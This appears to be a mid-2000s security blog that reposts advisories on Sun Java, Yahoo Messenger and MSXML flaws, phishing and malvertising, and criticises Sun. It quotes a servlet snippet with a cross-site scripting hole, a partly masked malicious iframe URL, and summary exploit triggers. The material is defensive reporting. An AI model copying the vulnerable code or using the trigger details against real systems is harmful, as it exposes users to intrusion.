MowGreen

Sun JRE Font Parsing Vulnerability

HIGHLY CRITICAL
Description:
A vulnerability has been reported in Sun JRE, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to an unspecified error in the parsing of fonts contained in Java applets. This can be exploited by malicious, untrusted applets to read and write local files, or to execute local applications.

The vulnerability is reported in the following products:
* JDK and JRE 5.0 Update 9 and earlier
* SDK and JRE 1.4.2_14 and earlier

Solution:
Update to the latest versions or apply patches:

JDK and JRE 5.0 Update 10 or later
http://java.sun.com/j2se/1.5.0/download.jsp

SDK and JRE 1.4.2_15 or later
http://java.sun.com/j2se/1.4.2/download.html

Posted by MowGreen at 2:12 PM | Permalink | Comments (0) | TrackBacks (0)

From Microsoft Technet Upcoming Chats

Q&A with the Security MVP Experts

We invite you to attend an Q&A with the Microsoft Security MVPs. In this chat the MVP experts will answer your questions regarding online safety issues such as phishing, spyware, rootkits as well as server related topics. If you have questions on how to protect your PC, please bring them to this informative chat

When: Thursday June 21st

Time: 4pm PST and 7pm EST

Where: TechNet Chat Room

No password required

Microsoft.com Chat
To view this specialized content, you are required to sign in with a Windows Live™ ID.
Don't have a Windows Live™ ID?
If you have a Hotmail address, MSN e-mail address, or Microsoft Passport, it's already a Windows Live ID.

You can sign in here with your existing e-mail address and password.
Sign up now to use one Windows Live ID to sign in to Windows Live, Microsoft.com, MSN, and Microsoft Passport sites.

Microsoft established this requirement, MVPs did NOT !

Posted by MowGreen at 11:41 AM | Permalink | Comments (0) | TrackBacks (0)

The never ending battle to get Sun to DO SOMETHING about their Java 'product' is NOT OVER
From : Java Security Traps Getting Worse

A year ago at JavaOne, Fortify Software Founder and Chief Scientist Brian Chess gave a presentation titled "12 Java Technology Security Traps and How to Avoid Them."

A year later, how far have we come in addressing those inherent vulnerabilities, which include XSS (cross-site scripting), SQL injection and native methods that allow the import of C or C++ code—along with its bugs? Not a smidge—unless you count going backwards.

It's gotten worse, Chess said in an interview with eWEEK, "and I've got evidence to prove it."

Fortify, which markets source-code analysis technology, has access to a large database of common Java programming errors and vulnerabilities, gleaned not only from its customers but also from a year of running the Java Open Review project.

In that project, Fortify uses FindBugs, a static analysis tool that looks for bugs in Java code, to look over code in open-source projects such as Apache, Azureus and Tomcat. Fortify does an analysis on each inspected code set, publishes online how many issues it finds and then shares with project maintainers the vulnerability specifics.

What Fortify has found from running the project is that the defect density of open-source code is "astronomical," Chess said, pointing out one project in particular that Fortify has inspected over the past year: Net Trust, with an estimated 12.215 errors per 1,000 lines of code.

"That's huge for a project with 'trust' in its name," Chess said.

Ironically enough, Net Trust is a Google project to create a security mechanism for simple single sign-on and authentication. "But they were students doing not very good code," Chess said.

Net Trust is one of many examples that demonstrate that Java security traps, although known for some time, are snaring more programmers all the time as use of the language grows.

To illustrate the lack of secure coding instruction, Chess points to a recent find he made, from none less than the Java giant, Sun. Specifically, the Sun introduction to servlet programming (Sun's simplest method for hooking Java up to the Web) contains cross-site scripting vulnerabilities.

One example of an XSS vulnerability are these lines from Sun's instructions:

try { firstname = request.getParameter("firstname"); } catch (Exception

e) { e.printStackTrace(); }

userName = firstname;

...

pw.print("
Thanks for your feedback, " + userName + "!
");

This code allows an attacker to inject code into the application that will be executed on a victim's browser, Chess said.

"The code expects that a user has entered a name like this: Bob," Chess wrote in an e-mail exchange. "But an attacker could set it up so that the data looks like this: and then the victim's browser would execute a function named sendDataToMotherShip()."

A secure version of the server-side code, Chess said, would check input to make sure that it only contains an expected set of characters and no executable scripts.

"SQL injection problems still do sit at the top of the list" of Java security traps, he said. "[Developers are] trusting input they shouldn't trust."

If this is coming from Sun, who can we trust? "You'll see that the tutorial never mentions security," Chess said. "With that in mind, it's not surprising that it contains cross-site scripting vulnerabilities."

Posted by MowGreen at 1:00 PM | Permalink | Comments (0) | TrackBacks (0)

FROM: Sophos announces top ten web and email-borne threats reported in April

Mal/Iframe, dominated the web-based malware chart in April, accounting for nearly half of the world's web threats. Iframe-based malware operates like a growing number of web-based attacks, looking for vulnerabilities on legitimate hosted websites and injecting malicious code onto the site. Once the site is infected, unwary visitors without web security, firewall or patches on their PCs, can themselves be infected.

"The Iframe-based attacks are a perfect example of a prolific web threat that target vulnerable sites - it doesn't care whether the site is hosting pornography or gardening tips," said Carole Theriault, senior security consultant at Sophos. "This problem is not just a niggle: Sophos research shows that a whopping 70% of web-based malware is being hosted on innocent but exploited websites. With people being lured to these innocent but compromised webpages via cleverly worded email invitations, web security has to go beyond blocking websites based upon category alone. A secure web defense will also scan pages for malicious content, regardless of whether they are on a site you would normally consider 'safe'."

Posted by MowGreen at 10:35 AM | Permalink | Comments (0) | TrackBacks (0)

From Winfixer and ValueClick – an oft appearing association, as blogged by MVP Sandi Hardmeier

My regular readers will remember my various articles about the Winfixer infiltration of the AOL and MSN advertising networks that happened not long ago. Winfixer infiltration of Web site advertising (as well as forum and comment spam) continues to be problematic, and one name that keeps on popping up over and over again is adfarm.mediaplex.com (Mediaplex is owned by ValueClick). The problem seems to be so endemic that any web site, forum or Web comment that utilises links that redirect to adfarm.mediaplex.com are potentially placing their visitors at risk of a Winfixer infection.

Over the past couple of months I have had in-person and telephone conferences with representatives and technical staff at MSN and AOL as a direct result of the Winfixer infilitrations of various advertising networks. They have learned a lot from the events of the past few months, as have I. I don't think any of us realised how widespread the problem was, or just how sophisticated the bad guys were getting, until we started taking a close look.

Mike Burgess and I have been having a close look at adfarm.mediaplex.com. I have tried to contact ValueClick regarding the adfarm.mediaplex.com problems using their “contact us” page on their Web site, but as of yet have received no response (and those of you that know me well know that a failure to respond is sure to intensify the attention that I pay to a problem advertisement network). I will be contacting them directly via an email address given to me by an associate as soon as this article goes live, and will report on their responses, if any.

These products appear under a variety of names and produce a variety of results for the end user, ranging from limited or no detection capability, coupled with a fraudulent request to pay for a “full” version, to outright malicious behavior, such as installing malicious software without the user’s consent in order to give the product something to detect. In many cases, the people behind such software would attempt to get the infected individual to pay them for removal of purported infections using fraud and social engineering.

Posted by MowGreen at 10:49 AM | Permalink | Comments (0) | TrackBacks (0)

From Secunia.com
Yahoo! Messenger AudioConf ActiveX Control Buffer Overflow

*Secunia Advisory: SA24742

Release Date: 2007-04-04

Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch

Software: Yahoo! Messenger 5.x
Yahoo! Messenger 6.x
Yahoo! Messenger 7.x
Yahoo! Messenger 8.x

Description:
A vulnerability has been reported in Yahoo! Messenger, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error within the AudioConf ActiveX control (yacscom.dll) component of Yahoo! Messenger. This can be exploited to cause a stack-based buffer overflow by setting the "socksHostname" and "hostName" properties to an overly large string and then calling the "createAndJoinConference()" method.

Successful exploitation allows execution of arbitrary code when a user visits a malicious web site.

The vulnerability is reported in version 8.x. Other versions may also be affected.

Solution:
Update to the latest version.

Set the kill-bit on the affected ActiveX control

Posted by MowGreen at 12:54 PM | Permalink | Comments (0) | TrackBacks (0)

From : Spyware Sucks
Owned by Sandi Hardmeier - a Microsoft MVP since 1999 specialising in Internet Explorer

A contact at Microsoft put me in touch with the appropriate people at AOL this morning - an advertising tech lead and a gentleman involved in policy and compliance. Thanks to a network capture that I gave to AOL they were finally able to shut down the track down the rogue advertiser who had infiltrated the AOL ad network to serve up winfixer malware advertisements.

Once the guys at AOL and I actually hooked up, it only took a few hours to get the account shut down. Damned if I know why it took for us to connect, but it did.

AOL's official statement on the incident is:

"We use a wide range of technical and policy measures to prevent malware distributors from placing advertisements on our networks, but apparently one was able to circumvent those measures. We have blocked this ad campaign and [are] working with our technical and legal teams to take additional steps to block similar issues in future."

Posted by MowGreen at 9:50 AM | Permalink | Comments (0) | TrackBacks (0)

From : Spyware Sucks
Owned by Sandi Hardmeier - a Microsoft MVP since 1999 specialising in Internet Explorer

This is simply not good enough.

MSN / Microsoft acted fast when *their* advertising network was infiltrated. AOL, it seems, are either incapable or unwilling to do anything to protect their readers.

The following was captured only minutes ago. This has been going on for days now, yet AOL remains unresponsive, leaving how many millions of users at direct risk of winfixer infection. I am going to use every means at my disposal, pull every string, take advantage of every relationship, to try and convince AOL to act.

If AOL will only act under a barrage of negative press, then so be it. Reality is that MS/MSN reacted, and reacted fast, when their network was infiltrated. I won't share exactly what MSN/MS did, but I will say that they took extremely strong steps to neutralise the risk to their users - steps that proved to me beyond a shadow of a doubt that MS and MSN were putting the safety of their users before everything else - steps that AOL seem to be unwilling or unable to take.

YO, AOL What's your problem ? Why is your User Base being exposed to this malware ? This is an ongoing issue !
The AOL advertisement network has DEFINITELY been infiltrated by winfixer That article was published last week. Get off your butts and DO SOMETHING ALREADY
Fix it or get fried, baby

Posted by MowGreen at 10:02 AM | Permalink | Comments (0) | TrackBacks (0)

From US-CERT Technical Cyber Security Alert TA07-022A

Original release date: January 22, 2007
Last revised: --
Source: US-CERT

Systems Affected
Sun Java Runtime Environment versions

* JDK and JRE 5.0 Update 9 and earlier
* SDK and JRE 1.4.2_12 and earlier
* SDK and JRE 1.3.1_18 and earlier

Overview

The Sun Java Runtime Environment contains multiple vulnerabilities that can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.

I. Description

The Sun Java Runtime Environment (JRE) allows users to run Java applications in a browser or as standalone programs. Sun has released updates to the Java Runtime Environment software to address multiple vulnerabilities. Further details about these vulnerabilities are available in the Vulnerability Notes Database.

Note that exploit code is publicly available for at least one of these vulnerabilities.

II. Impact

By convincing a user to run a specially crafted Java application, a remote, unauthenticated attacker can execute arbitrary code on a vulnerable system. A common attack vector would be a web page that contains a Java applet.

III. Solution
Apply an update from Sun

These issues are addressed in the following versions of the Sun Java Runtime environment:

* JDK and JRE 5.0 Update 10 or later
* SDK and JRE 1.4.2_13 or later
* SDK and JRE 1.3.1_19 or later

If you install the latest version of Java, older versions of Java may remain installed on your computer. If these versions of Java are not needed, you may wish to remove them. For instructions on how to remove older versions of Java, refer to the following instructions from Sun.

Posted by MowGreen at 11:44 AM | Permalink | Comments (0) | TrackBacks (0)

Since Sun's security position can not be taken seriously, as evidenced by the never-ending articles I've been writing here, let's see what the latest security issue they've sat on for hidden for the past SEVEN MONTHS is Java brews critical bug

A bug in the Java Runtime Environment (JRE) can leave corporate systems open to attack if a user visits a site containing malicious code, security researchers have warned.

The bug affects Windows, Linux and Solaris, and Sun has released a patch.

The JRE includes the Java Virtual Machine and supporting executables and files, and contains safeguards that prevent applets from causing trouble on the wider system. The newly disclosed flaw allows applets to upgrade their privileges, effectively giving them free access to the rest of the system, Sun said in an advisory.

"For example, an applet may grant itself permissions to read and write local files or execute local applications with the privileges of the user running the untrusted applet," Sun said.

The specific bug is to do with the processing of GIF image components, according to the Zero Day Initiative (ZDI), a bounty-oriented program run by 3Com's TippingPoint, which bought rights to disclosure from an anonymous researcher.

"When the image width in an image block of a valid GIF file is set to 0, the Java runtime will allocate the specified size but subsequently copy all data to the under allocated memory chunk," ZDI said in its advisory. "The overflow results in the corruption of multiple pointers, at least one of which is later dereferenced and can therefore result in execution of arbitrary code."

ZDI originally informed Sun of the problem back in June, the organization said.

Secunia, a third-party security company based in Denmark, said the problem was one of the most serious to have affected Java in some time. Secunia said the bug was "highly critical".

The bug affects Java Development Kit (JDK) and JRE 5.0 Update 9 and prior, Java Software Development Kit (SDK) and JRE 1.4.2_12 and prior, and SDK and JRE 1.3.1_18 and prior.

Posted by MowGreen at 11:19 AM | Permalink | Comments (0) | TrackBacks (0)

The Heathens have hacked Santa ! No, I'm not kidding. The source code of the Genuine Santa Page shows an iFrame that contains http://81.xxx.3.1xx/sp2_update/index.php . Once the iFrame is launched the javascript attempts to download and install file.exe. Scanning the file at VirusTotal shows

Complete scanning result of "file.exe", received in VirusTotal at 12.23.2006, 20:24:44 (CET).

Antivirus - Version - Update - Result
AntiVir 7.3.0.21 12.22.2006 HEUR/Malware
Authentium 4.93.8 12.22.2006 Possibly a new variant of W32/Dlr-Trojan-Malware-based!Maximus
Avast 4.7.892.0 12.21.2006 no virus found
AVG 386 12.23.2006 no virus found
BitDefender 7.2 12.23.2006 Generic.Malware.Bdld!!.39E6F2BB
CAT-QuickHeal 8.00 12.23.2006 (Suspicious) - DNAScan
ClamAV devel-20060426 12.23.2006 no virus found
DrWeb 4.33 12.23.2006 DLOADER.Trojan
eSafe 7.0.14.0 12.23.2006 suspicious Trojan/Worm
eTrust-InoculateIT 23.73.9712.23.2006 no virus found
eTrust-Vet 30.3.3271 12.23.2006 no virus found
Ewido 4.0 12.23.2006 no virus found
Fortinet 2.82.0.0 12.23.2006 suspicious
F-Prot 3.16f 12.22.2006 Possibly a new variant of W32/Dlr-Trojan-Malware-based!Maximus
F-Prot4 4.2.1.29 12.22.2006 W32/Dlr-Trojan-Malware-based!Maximus
Ikarus T3.1.0.27 12.23.2006 no virus found
Kaspersky 4.0.2.24 12.23.2006 no virus found
McAfee 4925 12.22.2006 no virus found
Microsoft 1.1904 12.23.2006 no virus found
NOD32v2 1936 12.23.2006 probably a variant of Win32/TrojanDownloader.Small.AIF
Norman 5.80.02 12.22.2006 W32/Suscpious_F.gen
Panda 9.0.0.4 12.23.2006 Suspicious file
Prevx1 V2 12.23.2006 no virus found
Sophos 4.12.0 12.22.2006 Mal/Packer
Sunbelt 2.2.907.0 12.18.2006 VIPRE.Suspicious
TheHacker 6.0.3.135 12.20.2006 no virus found
UNA 1.83 12.22.2006 no virus found
VBA32 3.11.1 12.23.2006 suspected of Win32.Trojan.Downloader (http://...)
VirusBuster 4.3.19:9 12.23.2006 novirus:Packed/FSG

A vulnerability exists in the XMLHTTP ActiveX control within Microsoft XML Core Services that could allow for remote code execution. An attacker could exploit the vulnerability by constructing a specially crafted Web page that could potentially allow remote code execution if a user visited that page or clicked a link in an e-mail message. An attacker who successfully exploited this vulnerability could take complete control of an affected system. However, user interaction is required to exploit this vulnerability.

If, for some reason, the update is not installed, please go the Security Bulletin page and click the Download the update link under Affected components for the version of MSXML that is currently installed.
In order to determine which version is installed if there are no MSXML packages listed in Add/Remove Programs,
check the WINDOWS\system32 folder for :

Msxml4.dll
and
Msxml6.dll

If either are present, right click it, choose Properties, and then click the Version tab.
The files contained in the update are the following Versions:

Msxml4.dll Version number 4.20.9841.0
Msxml6.dll Version number 6.0.3890.0

Both are dated 11/4/2006
If you've had an issue installing KB929798, then check to see if KB925672 is installed in Add/Remove Programs.
If it is, uninstall it, reboot, and then install KB929798, then reboot, as it supercedes it.

From the Secunia Advisory :

Description:
A vulnerability has been discovered in Microsoft XML Core Services, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to an error in the XMLHTTP ActiveX Control (msxml4.dll) within the "setRequestHeader()" method.

Successful exploitation allows execution of arbitrary code when a user e.g. visits a malicious website using Internet Explorer.

The vulnerability is confirmed on a fully patched Windows XP SP2 system with msxml4.dll version 4.20.9818.0 installed. Other versions may also be affected.

NOTE: The vulnerability is already being actively exploited.

Posted by MowGreen at 11:39 AM | Permalink | Comments (0) | TrackBacks (0)

From our 'buddies' at Sun : Vulnerabilities in the Java Runtime Environment may Allow Untrusted Applets to Elevate Privileges and Execute Arbitrary Code

Impact

Two buffer overflow vulnerabilities in the Java Runtime Environment may independently allow an untrusted applet to elevate its privileges. For example, an applet may grant itself permissions to read and write local files or execute local applications that are accessible to the user running the untrusted applet.

Sun acknowledges, with thanks, Chris Evans, for bringing these issues to our attention.
2. Contributing Factors

These issues can occur in the following releases (for Windows, Solaris, and Linux):

* JDK and JRE 5.0 Update 7 and earlier
* SDK and JRE 1.4.2_12 and earlier
* SDK and JRE 1.3.1_18 and earlier

Impact
Two vulnerabilities in the Java Runtime Environment may independently allow an untrusted applet to access data in other applets.

Sun acknowledges, with thanks, Tom Hawtin, for bringing these issues to our attention.
2. Contributing Factors

The first issue can occur in the following releases (for Windows, Solaris, and Linux):

* JDK and JRE 5.0 Update 5 and earlier
* SDK and JRE 1.4.2_10 and earlier
* SDK and JRE 1.3.1_18 and earlier

The second issue can occur in the following releases (for Windows, Solaris, and Linux):

* JDK and JRE 5.0 Update 6 and earlier
* SDK and JRE 1.4.2_12 and earlier
* SDK and JRE 1.3.1_18 and earlier

Impact

Two vulnerabilities related to serialization in the Java Runtime Environment may independently allow an untrusted applet or application to elevate its privileges.

Sun acknowledges, with thanks, Tom Hawtin, for bringing these issues to our attention.
2. Contributing Factors

These issues can occur in the following releases (for Windows, Solaris, and Linux):

* JDK and JRE 5.0 Update 7 and earlier
* SDK and JRE 1.4.2_12 and earlier

Note: SDK and JRE 1.3.x are not affected.

Resolution

These issues are addressed in the following releases (for Windows, Solaris, and Linux):

* JDK and JRE 5.0 Update 8 or later
* SDK and JRE 1.4.2_13 or later

Note: JRE 5.0 Update 8 for Solaris was also delivered in the following patches:

* J2SE 5.0: update 8 (as delivered in patch 118666-07)
* J2SE 5.0: update 8 (as delivered in patch 118667-07 (64bit))
* J2SE 5.0_x86: update 8 (as delivered in patch 118668-07)
* J2SE 5.0_x86: update 8 (as delivered in patch 118669-07 (64bit))

The latest releases for J2SE are available for download at:

J2SE 5.0:

* http://java.sun.com/javase/downloads/index_jdk5.jsp
* http://java.com

J2SE 5.0 Update 9 for Solaris is also available in the following patches:

* J2SE 5.0: update 9 (as delivered in patch 118666-09)
* J2SE 5.0: update 9 (as delivered in patch 118667-09 (64bit))
* J2SE 5.0_x86: update 9 (as delivered in patch 118668-09)
* J2SE 5.0_x86: update 9 (as delivered in patch 118669-09 (64bit))

J2SE 1.4.2 is available for download at:

* http://java.sun.com/j2se/1.4.2/download.html

For further laughs check this out Java SE Naming and Versions

The current release is Java Platform, Standard Edition 6 (Java SE 6). The previous release was Java 2 Platform, Standard Edition 5.0 (J2SE 5.0).

Sun Microsystems simplified the platform name in 2006 to better reflect the level of maturity, stability, scalability, and security built into the Java platform. Sun dropped the "2" from the name and deleted the "dot number" (the number following the period). Any updates to Java platforms will simply be noted as updates rather than adding a "dot number" at the end of the platform name.

Due to significant popularity within the Java developer community, the development kit has reverted back to the name "JDK" from "Java 2 SDK" (or "J2SDK"). The runtime environment has reverted back to "JRE" from "J2RE." (Note that "JDK" stands for "J2SE Development Kit" in version 5.0.)

For more information on platform names and version numbers, see the following pages:

* Java SE 6 Platform Name and Version Numbers
* J2SE Version 1.5.0 or 5.0?
* J2SE SDK/JRE Version String Naming Convention

Posted by MowGreen at 12:17 PM | Permalink | Comments (0) | TrackBacks (0)

Version 6 of the Sun JRE was released today. Don't hold your breath waiting for the so-called java autoupdater to notify you of it's availibilty, though. In fact, while checking out the latest version of Sun's JRE, I came across their Manual Download web page
Trouble is, the version offered there is v.1.5.0_09. The latest v.5 Java is now at 1.5.0_10 !
So, WHY is it not being offered ?
Better yet, going to the Verify Installation page tells me that the latest version is installed.

Description -- Your Environment
Java Runtime Vendor: Sun Microsystems Inc.
Java Runtime Version 1.5.0_09

CONGRATULATIONS, you have the Latest version of Java!

Posted by MowGreen at 2:24 PM | Permalink | Comments (0) | TrackBacks (0)

A Security Vulnerability in the Java Runtime Environment Swing Library may Allow an Untrusted Applet to Access Data in Other Applets

* Date Released: 14-Nov-2006
* Date Closed: 14-Nov-2006

1. Impact

A security vulnerability in the Java Runtime Environment Swing library may allow an untrusted applet to access data in other applets.

Sun acknowledges, with thanks, Tom Hawtin, for bringing this issue to our attention.
2. Contributing Factors

This issue can occur in the following releases (for Solaris, Linux and Windows platforms):

* JDK and JRE 5.0 Update 7 and earlier

Note: SDK and JRE 1.4.2_xx and earlier and 1.3.1_xx and earlier are not affected by this issue.

To determine the default version of the JRE on a system for Solaris and Linux, the following command can be run:

% java -version

Note: The above command only determines the default version. Other versions may also be installed on the system.

To determine the default version of the JRE on a system for Windows:

1. Click "Start"
2. Select "Run"
3. Type "cmd" (starts a command-line)
4. At the prompt, type "java -version"

Note: The above command only determines the default version. Other versions may also be installed on the system.
3. Symptoms

There are no reliable symptoms that would indicate the described issue has been exploited.

Solution Summary Top
4. Relief/Workaround

There is no workaround. Please see the "Resolution" section below.

5. Resolution

This issue is addressed in the following releases:

* JDK and JRE 5.0 Update 8 and later (for Solaris, Linux and Windows)

J2SE 5.0 is available for download at the following links:

* http://java.sun.com/j2se/1.5.0/download.jsp
* http://java.com

Why does Sun behave in such an arrogant manner ? If Microsoft behaved as Sun does it would be a big media circus with the whining and gnashing of teeth over MS' arrogant, monopolistic behavior .
So, just what is it with Sun ?
The java autoupdater is BROKEN . I waited over a month for it to update the java package on my system just out of curiousity. The latest update brought the J2SE up to v. 1.5.0_09. Now, what if v.1.5.0_07 had been the J2SE and the system had been to a site with a malicious java applet that had used the vuln to ... access data in other java applets.
WHAT would have happened ? Should I guess or wait until Sun imparts their knowledge to the rest of the World ?
AND, the autoupdating mechanism does NOT remove older, vulnerable versions of the runtimes.

Acccording to Sun, starting with the v.1.5.0_06 J2SE, no runtimes could be utilized by malwares. OK, thanks.
Now, why are applets exploitable and just what the heck IS the exploit ?

Posted by MowGreen at 7:29 PM | Permalink | Comments (0) | TrackBacks (0)

From DSL Reports -
MySpace Phish Met With Hosting Provider Apathy: What's the responsibility of hosting providers?

Yesterday we reported on a widespread phishing attack on MySpace, in which personal profiles had their HTML gamed to entirely overlay the usual look and feel with what appeared to be a real MySpace login page. A valid page should be hosted at login.myspace.com, but since this one was at myspace.com, it would have fooled even most phishing experts. Users have been told to watch the URL, and we're sure many did. Oops.

When the user submitted the phake form, it passed the user's name and password to a login.php script hosted on a third-party website, which dumped the data into a file. The user was then rerouted to the standard MySpace login. Users would presumably believe they had simply mistyped their password and would try again, unaware that they had been conned.

The directory holding this accumulated booty was visible to anybody who looked into the HTML source, and the file containing the user information could be downloaded by anyone. These unfortunate victims were now in the public domain. It's common for phishing drop boxes to be located in hard-to-reach jurisdictions. Because this one was in the United States, there was hope that the matter could be resolved in short order.

A number of the users in our security forums attempted to contact the web host, iPowerWeb, in an attempt to get them to shut this site down. However, users were shocked to find that the provider had positively no interest in mitigating the damage of this phishing operation.

One of our resident security experts informs us they were told that since the phished site was hosted elsewhere, nothing could be done. The easily accessible treasure trove of user information was "just a file of names," users were told. "They would not even consider looking at the MySpace page in order to reach their own judgement," one security expert tells us. "They simply did not care."

Others resident phish-trackers got the same response from iPowerWeb and were told there simply wasn't ample evidence this was even a phish. Users pointed out that the login.php script clearly involved the MySpace login page, and that the purported website fashion-infos.com had no obvious connection to MySpace. None of this information had any impact.

A long six hours later, the drop-box site was finally removed. We're unsure what triggered the hosting provider to finally take action, but we're curious about how many new users the phish grabbed during those six hours.

Posted by MowGreen at 10:14 PM | Permalink | Comments (1) | TrackBacks (0)

" It seems like Internet Explorer has been given a lot of heat lately with a rash of 0day vulnerabilities, and if you do use IE then do yourself a favor and visit ZERT, but has the time come for Firefox to shine as well? If you take a brief look at the list of publicly known vulnerabilities in Firefox it should come as no surprise that there will naturally be a sleuth of undisclosed vulnerabilities as well.

At the ToorCon 2006 conference, Mischa Spiegelmock and Andrew Wbeelsoi made a point out of demonstrating a live exploit running in Firefox 1.5.0.7. Their main motivation was appareantly to create bot networks for their personal use, or in their own words - “communication networks for black hats”.

Spiegelmock claims that the Javascript implementation in Firefox is a “complete mess”, stating further that “It is impossible to patch”. Personally, I disagree - though perhaps only on the finer points of those statements. Browsers are inherently insecure by design, not because of any one vendors particular implementation. Their objective is to retrieve arbitrary textual content from an untrusted network location, parse that text into a set of processing instructions and then render a visual representation of the document. Browsers are semi-compilers with a range of legacy deviations that all add up to enormously complex parsing environments, the perfect hunting ground for vulnerabilities caused by developer oversight. Adding Javascript on top of that only increases the complexity linearly instead of exponentially. "

Posted by MowGreen at 6:42 PM | Permalink | Comments (0) | TrackBacks (0)

Java Plug-in and Java Web Start May Allow Applets and Applications to Run With Unpatched JRE

At the very bottom of the above page it clearly states

Note: It is recommended that affected versions be removed from your system. For more information, see the installation notes on the respective java.sun.com download pages.

The Java Plug-in and Java Web Start both allow applets and applications to specify the version of the Java Runtime Environment (JRE) to run with. However, the versions of Java Web Start and the Java Plug-in listed in Section 2 below may allow applets or applications to run with a specified version of the JRE that does not have the latest security fixes.

2. Contributing Factors

* Java Plug-in included with J2SE 5.0 Update 5 and earlier, 1.4.x,
1.3.1, and 1.3.0_02 and later
* Java Web Start included with J2SE 5.0 Update 5 and earlier, and
1.4.2
* Java Web Start 1.2, 1.0.2, 1.0.1, and 1.0

Notes:
1. Prior to 5.0 Update 6, an applet could specify the version of the JRE on which it would run. With 5.0 Update 6 and later installed on the Windows platform, all applets are executed with the latest version of the JRE.

The only reason one would remove 1.5.0_06, or v.07 would be to conserve disk space, according to Sun.

I may be a tad "crazy", but I ain't dumb, Sun. ( Or is that dim sum ;)

Posted by MowGreen at 7:33 PM | Permalink | Comments (0) | TrackBacks (0)

Websense® Security Labs™ has received a sample of a new phishing Trojan that delivers stolen information back to the attacker via ICMP packets. Upon infection of a victim's computer, the Trojan will install itself as an Internet Explorer Browser Helper Object (BHO). The BHO then waits for the user to post personal information to a monitored website. As this information is entered by the user, it is captured by the BHO and sent back to the attacker. The method of network transport used by the attacker makes this Trojan unique. Typically, keyloggers of this type will send the stolen information back to the attacker via email or HTTP POST, which can appear suspicious. Instead, this Trojan encodes the data with a simple XOR algorithm before placing it into the data section of an ICMP ping packet.

( ICMP packets are not blocked Outbound by the Windows Firewall in XP SP2 )

Posted by MowGreen at 10:04 AM | Permalink | Comments (1) | TrackBacks (0)

Once again, Sun drops the ball. Besides the ongoing issue with the Java automatic updating mechanism, Secunia issued this Highly Critical alert on 11/29/05 Sun Java JRE Sandbox Security Bypass Vulnerabilities

Description:
Some vulnerabilities have been reported in Sun Java JRE (Java Runtime Environment), which can be exploited by malicious people to compromise a user's system.

1) An unspecified error may be exploited by a malicious, untrusted applet to read and write local files or execute local applications.

The vulnerability has been reported in JDK/JRE 5.0 Update 3 and prior on Windows, Solaris and Linux platforms. SDK/JRE 1.4.2_xx and prior, and 1.3.1_xx releases are not affected.

2) Three unspecified vulnerabilities with the use of "reflection" APIs error may be exploited by a malicious, untrusted applet to read and write local files or execute local applications.

The following releases are affected by one or more of the three vulnerabilities on Windows, Solaris and Linux platforms:
* SDK and JRE 1.3.1_15 and prior.
* SDK and JRE 1.4.2_08 and prior.
* JDK and JRE 5.0 Update 3 and prior.

3) An unspecified error in the JMX (Java Management Extensions) implementation included with the JRE may be exploited by a malicious, untrusted applet to read and write local files or execute local applications.

The vulnerability has been reported in JDK/JRE 5.0 Update 3 and prior on Windows, Solaris and Linux platforms. SDK/JRE 1.4.2_xx and prior, and 1.3.1_xx releases are not affected.

Solution:
Update to the fixed versions.

JDK and JRE 5.0:
Update to JDK and JRE 5.0 Update 4 or later.
http://java.sun.com/j2se/1.5.0/download.jsp

SDK and JRE 1.4.x:
Update to SDK and JRE 1.4.2_09 or later.
http://java.sun.com/j2se/1.4.2/download.html

SDK and JRE 1.3.x:
Update to SDK and JRE 1.3.1_16 or later.
http://java.sun.com/j2se/1.3/download.html

Provided and/or discovered by:
The vendor credits Adam Gowdiak.

Original Advisory:
Sun Microsystems:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102050-1
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102003-1
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102017-1

REMEMBER: The java autotmatic update mechanism does NOT uninstall the older, vulnerable versions previously installed. To uninstall them, go to Add/Remove Programs in the Control Panel and click on Remove.
Maybe if Sun bundled some security with their updates instead of the Google Toolbar, then the average User wouldn't need to uninstall older versions.

And, to top it all off, if one goes to Sun's very own java version checking page, it does NOT report the correct number of the latest version. I tested this on my normal, every day OS, Win XP Pro, and it claimed the system had the latest version, when in fact, it was two versions behind. It had JSE 1.5._04 installed and the latest version, as of today, is 1.5.0_6.

How do your like your Google Toolbar now ? Pathetic, Sun, just pathetic.

Posted by MowGreen at 6:24 AM | Permalink | Comments (0) | TrackBacks (0)

If you haven't already read the previous article on why the Sun Java Auto Update mechanism is inherently insecure and just plain badly coded, then go here Sun Java (J2SE/JRE) Automatic Update Vulnerability. Seems they've done it again. Just exactly what is their problem ? Can they not hire some decent coders ? Or, do they just not care about possible Security vulnerabilities in J2SE ?

Sun Alert ID: 101981 (RESOLVED)

Synopsis: GTE CyberTrust Root Certificate Included in Various
Releases of J2SE will Expire on February 23, 2006
Date Released: 24-Oct-2005
Date Closed: 24-Oct-2005

To view this Sun Alert document please go to the following URL:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-101981-1

Windows, Solaris, and Linux Platforms
* J2SE 5.0
* J2SE 1.4.2
* J2SE 1.4.1

> Impact

> A GTE CyberTrust root certificate included in various releases of Java 2 Platform, Standard Edition (listed below) will expire on February 23, 2006. Upon expiration, users of Java applications and applets, deployed with the Java Plug-in or Java Web Start which authenticate using certificates issued by the expiring root certificate may see a security warning dialog box during the authentication process.

> Relief/Workaround

> The security warning dialog box (described in "Symptoms" above) provides the option to grant permissions with the "Grant this session" or "Grant always" buttons. You may run the software by selecting either button. However, please **note that you should not choose these options unless you are prepared to trust the software that you are going to run.**

> Resolution

> The GTE CyberTrust root certificate will not be renewed by the Certification Authority, CyberTrust, Inc. Therefore, there are no software updates from Sun Microsystems, Inc., and you do not need to update your J2SE releases for this expiration

OK, let's see if we have this one straight. The GTE CyberTrust root certificate will expire February 23, 2006. GTE will no longer issue certs. So, when going to a website after that date, a website that may or not be malicious or have been hacked by a malicious individual , one is supposed to know if the java applet that is attempting to load is to be trusted or not.
Pray tell Sun, how would one determine that ?

What's galling is that they absolve themselves of any responsibility in this matter.

Therefore, there are no software updates from Sun Microsystems, Inc., and you do not need to update your J2SE releases for this expiration

Posted by MowGreen at 10:55 PM | Permalink | Comments (1) | TrackBacks (0)

3 Critical Releases :

Microsoft Security Bulletin MS05-050
Vulnerability in DirectShow Could Allow Remote Code Execution (904706)

Affected Software:
